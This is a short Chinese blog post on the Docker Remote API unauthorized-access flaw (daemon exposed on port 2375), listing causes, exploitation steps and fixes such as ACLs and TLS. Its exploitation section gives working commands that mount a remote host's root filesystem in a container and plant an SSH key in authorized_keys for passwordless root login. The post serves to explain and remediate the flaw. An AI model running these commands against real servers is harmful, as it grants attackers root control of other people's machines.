Docker Remote Api未授权访问漏洞

最新推荐文章于 2024-06-11 17:05:35 发布
最新推荐文章于 2024-06-11 17:05:35 发布
阅读量3k 收藏 3
点赞数 2
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sethcss/article/details/73395617
版权

一. 漏洞原因

  1. dockerd -H unix:///var/run/docker.sock -H 0.0.0.0:2375

  2. docker守护进程监听在0.0.0.0,外网可访问

  3. 没有使用iptables等限制可连接的来源ip

二. 漏洞利用

1.远程对被攻击的主机的docker容器进行操作

docker -H tcp://remoteip:2375 images

  1. 远程启动被攻击主机的docker容器.并挂在宿主机的目录,通过容器修改宿主机的authrized_keys文件,写入公钥.

docker -H tcp://remoteip:2375 run -it -v /:/mnt imageId /bin/bash

三. 演示步骤

ssh-keygen 生成公钥文件

docker -H tcp://remoteip:2375 images 查看镜像

docker -H tcp://remoteip:2375 run -it -v /:/mnt imageId /bin/bash 启动一个容器并将宿主机根目录挂在到容器的mnt目录

mkdir .ssh 创建ssh目录

touch authorized_keys 创建文件

将公钥的文件写入authorized_keys

ssh root@remoteip 免密码登录宿主机

四. 修复方法

  1. 设置ACL, 只允许信任ip连接对应端口

  2. 开启TLS,使用生成的证书进行认证

https://docs.docker.com/engine/security/https/

sethcss
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Docker Remote API 越权漏洞
人猿进化论
12-06 600
Docker Remote API 漏洞
Docker Remote API 授权漏洞全球探测1
08-03
漏洞发现的起因是,有一位同学在使用 docker swarm 的时候,发现了管理的 docker 节点上会开放一个 TCP 端口 2375,绑定在 0.0.0.
DockerDocker Remote API 访问控制
01-09
Docker Remote API 访问控制 Docker的远程调用 API 接口存在授权访问漏洞,至少应限制外网访问。建议使用 Socket 方式访问,监听内网 ip,docker daemon 启动方式如下: [root@localhost ~]# vim /usr/lib/systemd/system/docker.service ##更改插入如下内容 #ExecStart=/usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock ExecStart=/usr/bin/dockerd -H unix:/
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
myJavaHe的博客
03-15 2155
Docker远程接口授权访问漏洞解决方案之 Docker Remote API TLS 认证
Docker授权访问漏洞详解
最新发布
m0_64481831的博客
06-11 1119
Docker是一个开源的引擎,可以轻松地为任何应用创建一个轻量级的、可移植的、自给自足的容器。
Docker_remote_api授权访问漏洞
weixin_46564680的博客
10-13 2116
Docker_remote_api授权访问漏洞 docker_remote_api简介: docker remote api主要的目的是取代命令行界面, docker client和docker daemon通过unix domain socket进行通信. 默认情况下,只有本机的root和docker组用户才能操作docker. 漏洞成因: dockerd -H unix:///var/run/docker. sock -H 0.0. 0.0:2375 docker守护进程监听在0.0.0.0,外网可
Docker授权漏洞复现(合天网安实验室)
weixin_51151498的博客
11-29 1309
Docker授权漏洞复现(合天网安实验室)
配置开启Docker2375远程连接与解决Docker授权访问漏洞
Sherry
11-13 4803
配置开启Docker2375远程连接与解决Docker授权访问漏洞
漏洞复现 - - -Docker授权访问漏洞
weixin_67503304的博客
08-16 4869
Docker授权访问漏洞docker授权写定时任务获取shell,详细概述了通过docker获取shell的方法。
1. 离线安装docker; 2. 实现docker-cert配置,修复docker remote API漏洞;.zip
04-30
docker安装 docker安装方法有多种,下面列举在Windows和Linux系统中的安装步骤:12 ...可以通过访问Docker官网的CentOS下载地址获取帮助文档,按步骤进行安装。 安装Docker CE(Community Edition)
基于Docker的MongoDB实现授权访问的方法
09-09
主要介绍了基于Docker的MongoDB实现授权访问的方法,需要的朋友可以参考下
[Shell]Docker remote api授权访问漏洞(Port=2375)
baguangman5501的博客
09-16 686
0x01 简介 该授权访问漏洞是因为docker remote api可以执行docker命令,从官方文档可以看出,该接口是目的是取代docker 命令界面,通过url操作dockerDocker remote Api授权访问的攻击原理与之前的Redis授权访问漏洞大同小异,都是通过向运行该应用的服务器写文件,从而拿到服务器的权限。 docker swarm是docker下的分...
docker api授权导致rce 漏洞修复
core815的专栏
05-26 1597
docker api授权导致rce 漏洞修复
2375端口docker授权访问
panyu_123的博客
09-28 333
查了相关资料,输入IP:2375/version,返回了docker信息,这就证明了授权漏洞的存在。为进一步证明漏洞,执行命令docker -H tcp://IP:2375 ps,返回部署服务的信息。2375端口被扫描出来时,扫出来的服务是docker服务。这时直接访问IP:2375,提示page not found。按道理该端口是通的,只是url不对。PS:这个漏洞一般的扫描软件是可以直接扫描出来的,很早的漏洞了。在此记录一下自己又一次的知识积累,hhhh。
Docker 授权访问漏洞
Thunderclap的博客
07-13 2021
Docker 授权访问漏洞
漏洞——Docker远程api授权访问(原理扫描)
龍承leo
10-24 829
Docker远程api授权访问(原理扫描)
Docker授权访问漏洞
qq_50854662的博客
10-18 1329
Docker授权访问漏洞
Docker Registry 授权访问漏洞
04-25
Docker Registry 授权访问漏洞是指攻击者可以在授权的情况下访问或者下载镜像。这种漏洞的危害性较大,因为攻击者可以使用被盗取的镜像发起攻击,造成不可预测的后果。要解决这个问题,可以通过限制访问 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值